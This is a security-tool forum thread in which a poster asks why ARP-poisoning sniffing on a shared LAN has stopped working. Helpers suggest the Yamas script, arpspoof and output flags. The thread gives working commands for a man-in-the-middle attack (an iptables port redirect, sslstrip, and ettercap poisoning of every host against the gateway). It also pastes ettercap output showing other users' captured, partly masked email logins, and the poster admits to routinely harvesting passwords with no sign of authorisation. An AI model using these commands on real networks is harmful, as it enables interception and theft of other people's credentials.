I don't really get what you're trying to do here... Try Yamas, it's a script I wrote for sniffing. You can either use arpspoof or ettercap by launching it with argument -e.
There is also a thread on the forums
Any idea of what is going on with sniffing?
Well, here is the problem, I will post what I'm doing, hoping you can help me or any advice will be appreciated:
Using ettercap cannot sniff.
Cannot ping to router, or any other IP's, packets are just dropped.
Using sslstrip cannot strip anything.
Anyway,I can access the internet.
I used nmap to have an idea of what is the lan and saw all 3 ip's. But one of the laptops is hosting what appears to be Apache in port 5835(HTTPD V2).
I just cannot ping to that PC, by the way, this PC has a neme: xxxx.lan (192.xxx.xxx.64), all other ports are closed, except 5835 (open).
I see that all nmap reports hands out the IP, but that one has the xxxx.lan?..
Local domain?
Ettercap, sslstrip,arpspoofing have problems with .local domains?
Any idea?
Re: Any idea of what is going on with sniffing?
I don't really get what you're trying to do here... Try Yamas, it's a script I wrote for sniffing. You can either use arpspoof or ettercap by launching it with argument -e.
There is also a thread on the forums
Running both KDE and GNOME BT5 flawlessly. Thank you !
Re: Any idea of what is going on with sniffing?
Not working. Can't sniff anything with yamas either. Is there any relation with avahi (disabled) and sniffing?
Re: Any idea of what is going on with sniffing?
What kind of sniffing are you trying to do anyway ?
What techniques did you try ?
Running both KDE and GNOME BT5 flawlessly. Thank you !
Re: Any idea of what is going on with sniffing?
Comax, first of all, I want to thank you for your help and interest, I really appreciate it.
Answering to your questions, I use ettercap and sslstrip together (separate terminals) trying to avoid the certificate message in ettercap when sniffing.
I'm just trying to sniff in a LAN, with 4 ethernet ports and wifi acces (It is a Thompson router TG585 v8). I used to do it almost every 2 days with success. But latley, I just cannot sniff anythig at all.
I use in Terminal 1:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sslstrip -p -f
In Terminal 2:
ettercap -Tqi eth1 -M arp:remote // /192.168.1.254/ -P autoadd
Just nothing can be sniffed now.
Tried yamas as advice by friend Comax, the same outcome.
Could be a firewall presence, a Domain?
Thanks...
Re: Any idea of what is going on with sniffing?
Comax, I used the script yamas, but same thing, it is not snifiing...
Any idea?
I'm confused..I used to captured passwds but after a tiem, I'm not able to...
Tried the plugin from ettercap to check poisson, it says that arp poissoning did not take place...
Re: Any idea of what is going on with sniffing?
How do you know nothing is being sniffed? Are you expecting ettercap to print output the screen? It won't since you're passing the -q flag. Try passing -w as well to write the output to a file so you can examine it with wireshark or tcpdump.
Re: Any idea of what is going on with sniffing?
+1 to shadowzero, you should examine the traffic (either after if you used -w or in real time, as it goes).
Did you try arpspoof ?
Have you tried different ways of poisoning ? One-way, two-way ? All the network, just separate targets ?
And sorry for the stupid question, but are you sure you're using the correct gateway ?
Now it's possible too that the router detects the flood of ARP requests and prevents it from working. Some dude reported it to be the case for him...
Running both KDE and GNOME BT5 flawlessly. Thank you !
Re: Any idea of what is going on with sniffing?
Sorry for the delay. Yes I'm isolating pc's when poissoning and gateway is the same, has not been changed (192.168.1.254)...Same result..
I tried poissoning one and two ways (using ettercap and arpspoof by separate).
Here is some data from ettercap before and after (when working and now):
************************************************** **************************************************
When it was working:
Listening on eth1... (Ethernet)
eth1 -> 00:0E:xx:xx:xx:xx 192.168.1.108 255.255.255.0
Privileges dropped to UID 1000 GID 1000...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |================================================= =>| 100.00 %
5 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : ANY (all the hosts in the list)
GROUP 2 : 192.168.1.254 00:25:xx:xx:xx
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
Activating autoadd plugin...
DHCP: [192.168.1.254] OFFER : 192.168.1.107 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 ""
DHCP: [192.168.1.254] OFFER : 192.168.1.107 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 ""
DHCP: [192.168.1.254] OFFER : 192.168.1.107 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 ""
DHCP: [192.168.1.254] OFFER : 192.168.1.107 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 ""
DHCP: [192.168.1.254] OFFER : 192.168.1.107 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 ""
HTTP : 65.54.xxx.xx:80 -> USER: xxxx_xxx@hhhhh.com PASS: xxxxxx INFO: login.live.com/ppsecure/post.srf?wa=wsignin1.0&rpsnv=11&ct=1325176303&rver =6.1.6206.0&wp=MBI&wreply=http://
HTTP : 65.54.xx.xxx:80 -> USER: jjjjjjjjjj@ggggg.com PASS: jjjjjjjjjj INFO: /ppsecure/post.srf?wa=wsignin1.0&rpsnv=11&ct=1325176303&rver =6.1.6206.0&wp=MBI&wreply=http://
After (Not sniffing):
Scanning for merged targets (142 hosts)...
* |================================================= =>| 100.00 %
4 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : 192.168.1.64 00:E1:XX:XX:xx:xx
GROUP 1 : 192.168.1.101 78:A0:xx:xx:xx
GROUP 1 : 192.168.1.106 3C:74:xx:xx:xx
GROUP 2 : 192.168.1.254 08:xx:xx:xx:xx (This is the gateway)
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
Activating autoadd plugin...
DHCP: [192.168.1.254] ACK : 192.168.1.65 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 "lan"
DHCP: [192.168.1.254] ACK : 192.168.1.65 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 "lan"
DHCP: [192.168.1.254] ACK : 192.168.1.65 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 "lan"
DHCP: [192.168.1.254] ACK : 192.168.1.65 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 "lan"
autoadd: 192.168.1.70 00:1B:77:xx:xx:xx added to GROUP1
autoadd: 192.168.1.189 28:E7:CF:xx:xx:xx added to GROUP1
autoadd: 192.168.1.137 60:33:4B:xx:xx:xx added to GROUP1
************************************************** *******************************
In the info I can see something in this lines:
Before (when sniffing):
DHCP: [192.168.1.254] OFFER : 192.168.1.107 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 ""
After (not sniffing)
DHCP: [192.168.1.254] OFFER : 192.168.1.107 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 "lan"
At the end of each line, when sniffing : ""
When not sniffing: "lan"
When using the ettercap plugin "chk_poisson" it says taht did not poisson....
We all are in the same subnet (192.168.1.40-253 -- Range in router's DHCP server). I also use sslstrip along with ettercap and nothing in sslstrip.log, empty...
Using yamas, same thing, it does not sniff any passwords...
Any idea?
Re: Any idea of what is going on with sniffing?
Wow man... Sorry, but I'm at loss here.
To sum up :
It used to work.
Nothing changed.
It no longer works, despite the plethora of ways given to do it.
That is weird bro. Sure your router hasn't been updated for instance ? They don't really warn you when they do this...
Have you tried running it off a clean LiveCD/new install ?
Running both KDE and GNOME BT5 flawlessly. Thank you !
Posting Permissions